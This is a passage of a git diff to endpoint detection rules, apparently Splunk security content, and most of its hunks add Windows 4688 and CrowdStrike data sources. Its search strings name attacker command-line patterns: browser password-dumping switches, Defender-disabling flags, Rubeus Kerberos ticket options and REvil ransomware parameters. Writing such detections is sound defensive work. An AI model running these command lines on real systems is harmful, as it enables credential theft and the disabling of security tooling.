   JNDI lookups and retrieve malicious payloads. If confirmed malicious, this activity
   could lead to remote code execution and further compromise of the affected server.
 data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 3
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where (Processes.process_name="java.exe" OR Processes.process_name=javaw.exe OR
   Processes.process_name=javaw.exe) by _time Processes.process_id Processes.process_name
diff --git a/detections/endpoint/password_policy_discovery_with_net.yml b/detections/endpoint/password_policy_discovery_with_net.yml
index 2f87a9098d..6b697a7d73 100644
--- a/detections/endpoint/password_policy_discovery_with_net.yml
+++ b/detections/endpoint/password_policy_discovery_with_net.yml
@@ -16,6 +16,8 @@ description: The following analytic identifies the execution of `net.exe` or `ne
   the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="net.exe"
   OR Processes.process_name="net1.exe") AND Processes.process = "*accounts*" AND Processes.process
diff --git a/detections/endpoint/permission_modification_using_takeown_app.yml b/detections/endpoint/permission_modification_using_takeown_app.yml
index 1b646b1786..45039ce8d3 100644
--- a/detections/endpoint/permission_modification_using_takeown_app.yml
+++ b/detections/endpoint/permission_modification_using_takeown_app.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the modification of file or director
   availability of critical data.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "takeown.exe"
   Processes.process = "*/f*" by Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/ping_sleep_batch_command.yml b/detections/endpoint/ping_sleep_batch_command.yml
index 647878ca12..a0e7829645 100644
--- a/detections/endpoint/ping_sleep_batch_command.yml
+++ b/detections/endpoint/ping_sleep_batch_command.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of ping sleep batch
   exfiltration.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_ping` (Processes.parent_process
   = "*ping*" Processes.parent_process = *-n* Processes.parent_process="* Nul*"Processes.parent_process="*&gt;*")
diff --git a/detections/endpoint/possible_browser_pass_view_parameter.yml b/detections/endpoint/possible_browser_pass_view_parameter.yml
index c2e79b5818..8af97a9021 100644
--- a/detections/endpoint/possible_browser_pass_view_parameter.yml
+++ b/detections/endpoint/possible_browser_pass_view_parameter.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies processes with command-line param
   and data breaches.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process  IN ("*/stext
   *", "*/shtml *", "*/LoadPasswordsIE*", "*/LoadPasswordsFirefox*", "*/LoadPasswordsChrome*",
diff --git a/detections/endpoint/possible_lateral_movement_powershell_spawn.yml b/detections/endpoint/possible_lateral_movement_powershell_spawn.yml
index 6b3a5242d9..9b3db5f4ae 100644
--- a/detections/endpoint/possible_lateral_movement_powershell_spawn.yml
+++ b/detections/endpoint/possible_lateral_movement_powershell_spawn.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the spawning of a PowerShell proces
   or persist within the environment.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=wmiprvse.exe
   OR Processes.parent_process_name=services.exe OR Processes.parent_process_name=svchost.exe
diff --git a/detections/endpoint/potentially_malicious_code_on_commandline.yml b/detections/endpoint/potentially_malicious_code_on_commandline.yml
index 1f8cb8a562..cc2bb36f5b 100644
--- a/detections/endpoint/potentially_malicious_code_on_commandline.yml
+++ b/detections/endpoint/potentially_malicious_code_on_commandline.yml
@@ -16,6 +16,8 @@ description: The following analytic detects potentially malicious command lines
   system compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel="Endpoint.Processes" by Processes.parent_process_name
   Processes.process_name Processes.process Processes.user Processes.dest  | `drop_dm_object_name(Processes)`  |
diff --git a/detections/endpoint/powershell___connect_to_internet_with_hidden_window.yml b/detections/endpoint/powershell___connect_to_internet_with_hidden_window.yml
index 9f971e9dbb..410de1915b 100644
--- a/detections/endpoint/powershell___connect_to_internet_with_hidden_window.yml
+++ b/detections/endpoint/powershell___connect_to_internet_with_hidden_window.yml
@@ -16,6 +16,8 @@ description: The following analytic detects PowerShell commands using the Window
   endpoint.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_powershell` by Processes.user
   Processes.process_name Processes.process Processes.parent_process_name Processes.original_file_name
diff --git a/detections/endpoint/powershell_disable_security_monitoring.yml b/detections/endpoint/powershell_disable_security_monitoring.yml
index 55118a87a7..1cf9ea9210 100644
--- a/detections/endpoint/powershell_disable_security_monitoring.yml
+++ b/detections/endpoint/powershell_disable_security_monitoring.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies attempts to disable Windows Defen
   exfiltration, further system compromise, or persistent access within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process="*set-mppreference*"
   AND Processes.process IN ("*disablerealtimemonitoring*","*disableioavprotection*","*disableintrusionpreventionsystem*","*disablescriptscanning*","*disableblockatfirstseen*","*DisableBehaviorMonitoring*","*drtm
diff --git a/detections/endpoint/powershell_get_localgroup_discovery.yml b/detections/endpoint/powershell_get_localgroup_discovery.yml
index 91b4f01e8e..233a46805d 100644
--- a/detections/endpoint/powershell_get_localgroup_discovery.yml
+++ b/detections/endpoint/powershell_get_localgroup_discovery.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the use of the `get-localgroup` c
   potentially leading to unauthorized access and control over the system.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=powershell.exe
   OR Processes.process_name=cmd.exe) (Processes.process="*get-localgroup*") by Processes.dest
diff --git a/detections/endpoint/powershell_start_bitstransfer.yml b/detections/endpoint/powershell_start_bitstransfer.yml
index f919c87e47..d41e79cdbf 100644
--- a/detections/endpoint/powershell_start_bitstransfer.yml
+++ b/detections/endpoint/powershell_start_bitstransfer.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the PowerShell comm
   and potentially leading to further exploitation of the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*start-bitstransfer*
   by Processes.dest Processes.user Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/prevent_automatic_repair_mode_using_bcdedit.yml b/detections/endpoint/prevent_automatic_repair_mode_using_bcdedit.yml
index aee3326249..f88b6c2c0a 100644
--- a/detections/endpoint/prevent_automatic_repair_mode_using_bcdedit.yml
+++ b/detections/endpoint/prevent_automatic_repair_mode_using_bcdedit.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of "bcdedit.exe" with
   leading to further damage.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "bcdedit.exe"
   Processes.process = "*bootstatuspolicy*"  Processes.process = "*ignoreallfailures*"
diff --git a/detections/endpoint/print_processor_registry_autostart.yml b/detections/endpoint/print_processor_registry_autostart.yml
index 1ed17ebb5e..489f58f2e0 100644
--- a/detections/endpoint/print_processor_registry_autostart.yml
+++ b/detections/endpoint/print_processor_registry_autostart.yml
@@ -13,7 +13,7 @@ description: The following analytic detects suspicious modifications or new entr
   this could allow an attacker to execute a malicious DLL payload by restarting the
   spoolsv.exe process, leading to potential control over the compromised machine.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count  min(_time) as firstTime
   max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path
diff --git a/detections/endpoint/process_creating_lnk_file_in_suspicious_location.yml b/detections/endpoint/process_creating_lnk_file_in_suspicious_location.yml
index 2703fd9a24..db3d11faae 100644
--- a/detections/endpoint/process_creating_lnk_file_in_suspicious_location.yml
+++ b/detections/endpoint/process_creating_lnk_file_in_suspicious_location.yml
@@ -13,7 +13,7 @@ description: The following analytic detects a process creating a `.lnk` file in
   If confirmed malicious, this could allow an attacker to maintain persistence, execute
   arbitrary code, or further compromise the system.
 data_source:
-- Sysmon Event ID 11
+- Sysmon EventID 11 AND Sysmon EventID 1
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_name="*.lnk"
   AND (Filesystem.file_path="C:\\Users\\*" OR Filesystem.file_path="*\\Temp\\*") by
diff --git a/detections/endpoint/process_deleting_its_process_file_path.yml b/detections/endpoint/process_deleting_its_process_file_path.yml
index 7a5942249f..afd82714e3 100644
--- a/detections/endpoint/process_deleting_its_process_file_path.yml
+++ b/detections/endpoint/process_deleting_its_process_file_path.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies a process attempting to delete it
   remediation efforts.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '`sysmon` EventCode=1 CommandLine = "* /c *" CommandLine = "* del*" Image
   = "*\\cmd.exe" | eval result = if(like(process,"%".parent_process."%"), "Found",
   "Not Found") | stats min(_time) as firstTime max(_time) as lastTime count by dest
diff --git a/detections/endpoint/process_execution_via_wmi.yml b/detections/endpoint/process_execution_via_wmi.yml
index 7516cc6bb5..3fe30bde40 100644
--- a/detections/endpoint/process_execution_via_wmi.yml
+++ b/detections/endpoint/process_execution_via_wmi.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of a process by `WmiPr
   or network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=WmiPrvSE.exe
   NOT (Processes.process IN ("*\\dismhost.exe*")) by Processes.dest Processes.user
diff --git a/detections/endpoint/process_kill_base_on_file_path.yml b/detections/endpoint/process_kill_base_on_file_path.yml
index d29dacb881..21e767e52b 100644
--- a/detections/endpoint/process_kill_base_on_file_path.yml
+++ b/detections/endpoint/process_kill_base_on_file_path.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of `wmic.exe` with the `dele
   and persistence within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   values(Processes.process_id) as process_id count min(_time) as firstTime max(_time)
   as lastTime  from datamodel=Endpoint.Processes where `process_wmic` AND Processes.process="*process*"
diff --git a/detections/endpoint/process_writing_dynamicwrapperx.yml b/detections/endpoint/process_writing_dynamicwrapperx.yml
index f73f8a86b5..ba6276e497 100644
--- a/detections/endpoint/process_writing_dynamicwrapperx.yml
+++ b/detections/endpoint/process_writing_dynamicwrapperx.yml
@@ -14,7 +14,7 @@ description: The following analytic detects a process writing the dynwrapx.dll f
   code, escalate privileges, or maintain persistence within the environment. Immediate
   investigation of parallel processes and registry modifications is recommended.
 data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 11
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   by _time Processes.process_id Processes.process_name Processes.dest Processes.process_guid
   Processes.user | `drop_dm_object_name(Processes)` | join process_guid [| tstats
diff --git a/detections/endpoint/processes_launching_netsh.yml b/detections/endpoint/processes_launching_netsh.yml
index 9d7abc4478..55d09e45ac 100644
--- a/detections/endpoint/processes_launching_netsh.yml
+++ b/detections/endpoint/processes_launching_netsh.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies processes launching netsh.exe, a
   threat to the network's integrity and security.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process)
   AS Processes.process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where `process_netsh` by Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/recursive_delete_of_directory_in_batch_cmd.yml b/detections/endpoint/recursive_delete_of_directory_in_batch_cmd.yml
index efef3925a2..d54e914328 100644
--- a/detections/endpoint/recursive_delete_of_directory_in_batch_cmd.yml
+++ b/detections/endpoint/recursive_delete_of_directory_in_batch_cmd.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of a batch command des
   efforts, severely impacting business operations.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_cmd` Processes.process=*/c*  Processes.process="*
   rd *"  Processes.process="*/s*" Processes.process="*/q*" by Processes.user Processes.process_name
diff --git a/detections/endpoint/reg_exe_manipulating_windows_services_registry_keys.yml b/detections/endpoint/reg_exe_manipulating_windows_services_registry_keys.yml
index 9a02f7a22d..4a899f456e 100644
--- a/detections/endpoint/reg_exe_manipulating_windows_services_registry_keys.yml
+++ b/detections/endpoint/reg_exe_manipulating_windows_services_registry_keys.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of reg.exe to modify registr
   system compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime values(Processes.process_name) as process_name values(Processes.parent_process_name)
   as parent_process_name values(Processes.user) as user FROM datamodel=Endpoint.Processes
diff --git a/detections/endpoint/registry_keys_for_creating_shim_databases.yml b/detections/endpoint/registry_keys_for_creating_shim_databases.yml
index 366ca03465..8fcb18edc5 100644
--- a/detections/endpoint/registry_keys_for_creating_shim_databases.yml
+++ b/detections/endpoint/registry_keys_for_creating_shim_databases.yml
@@ -14,7 +14,7 @@ description: The following analytic detects registry activity related to the cre
   manipulate application behavior, posing a severe risk to the integrity and security
   of the affected systems.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path=*CurrentVersion\\AppCompatFlags\\Custom* OR Registry.registry_path=*CurrentVersion\\AppCompatFlags\\InstalledSDB*)
diff --git a/detections/endpoint/registry_keys_used_for_persistence.yml b/detections/endpoint/registry_keys_used_for_persistence.yml
index c627f41d35..9c70a13351 100644
--- a/detections/endpoint/registry_keys_used_for_persistence.yml
+++ b/detections/endpoint/registry_keys_used_for_persistence.yml
@@ -15,7 +15,7 @@ description: The following analytic identifies modifications to registry keys co
   control over compromised systems, posing a severe threat to system integrity and
   security.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Registry where (Registry.registry_path=*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce
diff --git a/detections/endpoint/registry_keys_used_for_privilege_escalation.yml b/detections/endpoint/registry_keys_used_for_privilege_escalation.yml
index f04259902b..f040e11561 100644
--- a/detections/endpoint/registry_keys_used_for_privilege_escalation.yml
+++ b/detections/endpoint/registry_keys_used_for_privilege_escalation.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications to registry keys under
   attackers to execute arbitrary code with elevated privileges, leading to potential
   system compromise and persistent access.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE ((Registry.registry_path="*Microsoft\\Windows NT\\CurrentVersion\\Image File
diff --git a/detections/endpoint/regsvr32_silent_and_install_param_dll_loading.yml b/detections/endpoint/regsvr32_silent_and_install_param_dll_loading.yml
index 9694429dc7..818f60890d 100644
--- a/detections/endpoint/regsvr32_silent_and_install_param_dll_loading.yml
+++ b/detections/endpoint/regsvr32_silent_and_install_param_dll_loading.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the loading of a DLL using the regsv
   arbitrary code, maintain persistence, and further compromise the system.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` AND Processes.process="*/i*"
   by Processes.dest Processes.parent_process Processes.process Processes.parent_process_name
diff --git a/detections/endpoint/regsvr32_with_known_silent_switch_cmdline.yml b/detections/endpoint/regsvr32_with_known_silent_switch_cmdline.yml
index fca732291a..ef55514830 100644
--- a/detections/endpoint/regsvr32_with_known_silent_switch_cmdline.yml
+++ b/detections/endpoint/regsvr32_with_known_silent_switch_cmdline.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of Regsvr32.exe with t
   isolation are recommended.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` by Processes.user
   Processes.process_name Processes.process Processes.parent_process_name Processes.original_file_name
diff --git a/detections/endpoint/remcos_client_registry_install_entry.yml b/detections/endpoint/remcos_client_registry_install_entry.yml
index a85fb22e64..284c4f7e56 100644
--- a/detections/endpoint/remcos_client_registry_install_entry.yml
+++ b/detections/endpoint/remcos_client_registry_install_entry.yml
@@ -9,6 +9,8 @@ description: |-
   The following analytic detects the presence of a registry key associated with the Remcos RAT agent on a host. It leverages data from the Endpoint.Processes and Endpoint.Registry data models in Splunk, focusing on instances where the "license" key is found in the "Software\Remcos" path. This behavior is significant as it indicates potential compromise by the Remcos RAT, a remote access Trojan used for unauthorized access and data exfiltration. If confirmed malicious, the attacker could gain control over the system, steal sensitive information, or use the compromised host for further attacks. Immediate investigation and remediation are required.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 - Sysmon EventID 12
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time)
diff --git a/detections/endpoint/remote_desktop_process_running_on_system.yml b/detections/endpoint/remote_desktop_process_running_on_system.yml
index b5a0af8292..0811121698 100644
--- a/detections/endpoint/remote_desktop_process_running_on_system.yml
+++ b/detections/endpoint/remote_desktop_process_running_on_system.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the remote desktop
   network compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process=*mstsc.exe
   AND Processes.dest_category!=common_rdp_source by Processes.dest Processes.user
diff --git a/detections/endpoint/remote_process_instantiation_via_dcom_and_powershell.yml b/detections/endpoint/remote_process_instantiation_via_dcom_and_powershell.yml
index 8dc4550c8c..14db3eb4de 100644
--- a/detections/endpoint/remote_process_instantiation_via_dcom_and_powershell.yml
+++ b/detections/endpoint/remote_process_instantiation_via_dcom_and_powershell.yml
@@ -16,6 +16,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
   risk.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_powershell` (Processes.process="*Document.ActiveView.ExecuteShellCommand*"
   OR Processes.process="*Document.Application.ShellExecute*") by Processes.dest Processes.user
diff --git a/detections/endpoint/remote_process_instantiation_via_winrm_and_powershell.yml b/detections/endpoint/remote_process_instantiation_via_winrm_and_powershell.yml
index af56428100..ee7a0dbcfc 100644
--- a/detections/endpoint/remote_process_instantiation_via_winrm_and_powershell.yml
+++ b/detections/endpoint/remote_process_instantiation_via_winrm_and_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
   and lateral spread within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_powershell` (Processes.process="*Invoke-Command*"
   AND Processes.process="*-ComputerName*") by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/remote_process_instantiation_via_winrm_and_winrs.yml b/detections/endpoint/remote_process_instantiation_via_winrm_and_winrs.yml
index dc49246063..28bf4680c7 100644
--- a/detections/endpoint/remote_process_instantiation_via_winrm_and_winrs.yml
+++ b/detections/endpoint/remote_process_instantiation_via_winrm_and_winrs.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `winrs.exe` with co
   within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=winrs.exe
   OR Processes.original_file_name=winrs.exe) (Processes.process="*-r:*" OR Processes.process="*-remote:*")
diff --git a/detections/endpoint/remote_process_instantiation_via_wmi.yml b/detections/endpoint/remote_process_instantiation_via_wmi.yml
index 7c4474df53..f2a87b8c6a 100644
--- a/detections/endpoint/remote_process_instantiation_via_wmi.yml
+++ b/detections/endpoint/remote_process_instantiation_via_wmi.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of wmic.exe with param
   lateral spread within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_wmic` (Processes.process="*/node:*"
   AND Processes.process="*process*" AND Processes.process="*call*" AND  Processes.process="*create*")
diff --git a/detections/endpoint/remote_process_instantiation_via_wmi_and_powershell.yml b/detections/endpoint/remote_process_instantiation_via_wmi_and_powershell.yml
index 66811ce7f8..ca63658762 100644
--- a/detections/endpoint/remote_process_instantiation_via_wmi_and_powershell.yml
+++ b/detections/endpoint/remote_process_instantiation_via_wmi_and_powershell.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of `powershell.exe` us
   leading to further compromise and persistence within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_powershell` (Processes.process="*Invoke-WmiMethod*"
   AND Processes.process="*-CN*" AND Processes.process="*-Class Win32_Process*" AND  Processes.process="*-Name
diff --git a/detections/endpoint/remote_system_discovery_with_dsquery.yml b/detections/endpoint/remote_system_discovery_with_dsquery.yml
index bf994244b3..6c05bd96af 100644
--- a/detections/endpoint/remote_system_discovery_with_dsquery.yml
+++ b/detections/endpoint/remote_system_discovery_with_dsquery.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `dsquery.exe` with
   access to critical systems within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="dsquery.exe")
   (Processes.process="*computer*") by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/remote_system_discovery_with_net.yml b/detections/endpoint/remote_system_discovery_with_net.yml
index d77e2c716b..fe77a7dcf4 100644
--- a/detections/endpoint/remote_system_discovery_with_net.yml
+++ b/detections/endpoint/remote_system_discovery_with_net.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `net.exe` or `ne
   or lateral movement within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="net.exe"
   OR Processes.process_name="net1.exe") (Processes.process="*domain computers*" AND
diff --git a/detections/endpoint/remote_system_discovery_with_wmic.yml b/detections/endpoint/remote_system_discovery_with_wmic.yml
index 5615606282..6f0debeedd 100644
--- a/detections/endpoint/remote_system_discovery_with_wmic.yml
+++ b/detections/endpoint/remote_system_discovery_with_wmic.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `wmic.exe` with spe
   leading to unauthorized access and data exfiltration.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="wmic.exe")
   (Processes.process=*/NAMESPACE:\\\\root\\directory\\ldap* AND Processes.process=*ds_computer*
diff --git a/detections/endpoint/remote_wmi_command_attempt.yml b/detections/endpoint/remote_wmi_command_attempt.yml
index ce1fd3e8a3..ad4cc1dc12 100644
--- a/detections/endpoint/remote_wmi_command_attempt.yml
+++ b/detections/endpoint/remote_wmi_command_attempt.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of `wmic.exe` with the
   arbitrary commands, and potentially escalate privileges or persist within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_wmic` Processes.process=*node*
   by Processes.dest Processes.user Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/resize_shadowstorage_volume.yml b/detections/endpoint/resize_shadowstorage_volume.yml
index 1ac224b41a..07215402da 100644
--- a/detections/endpoint/resize_shadowstorage_volume.yml
+++ b/detections/endpoint/resize_shadowstorage_volume.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the resizing of shadow storage vo
   and increasing the potential for data loss.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as cmdline
   values(Processes.parent_process_name) as parent_process values(Processes.process_name)
   as process_name min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/revil_common_exec_parameter.yml b/detections/endpoint/revil_common_exec_parameter.yml
index bfef1d8320..0c6bc248ad 100644
--- a/detections/endpoint/revil_common_exec_parameter.yml
+++ b/detections/endpoint/revil_common_exec_parameter.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of command-line parame
   inaccessible and potentially causing significant operational disruption.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process = "* -nolan
   *" OR Processes.process = "* -nolocal *" OR Processes.process = "* -fast *" OR Processes.process
diff --git a/detections/endpoint/revil_registry_entry.yml b/detections/endpoint/revil_registry_entry.yml
index 82977a8971..21ccf24d35 100644
--- a/detections/endpoint/revil_registry_entry.yml
+++ b/detections/endpoint/revil_registry_entry.yml
@@ -16,6 +16,8 @@ description: The following analytic identifies suspicious modifications in the r
   information on compromised hosts.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 - Sysmon EventID 12
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time)
diff --git a/detections/endpoint/rubeus_command_line_parameters.yml b/detections/endpoint/rubeus_command_line_parameters.yml
index b091b3a554..24bb8f5c65 100644
--- a/detections/endpoint/rubeus_command_line_parameters.yml
+++ b/detections/endpoint/rubeus_command_line_parameters.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of Rubeus command line param
   sensitive information within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process = "*ptt /ticket*"
   OR Processes.process = "* monitor /interval*" OR Processes.process ="* asktgt* /user:*"
diff --git a/detections/endpoint/runas_execution_in_commandline.yml b/detections/endpoint/runas_execution_in_commandline.yml
index 5325220d71..59fcb501df 100644
--- a/detections/endpoint/runas_execution_in_commandline.yml
+++ b/detections/endpoint/runas_execution_in_commandline.yml
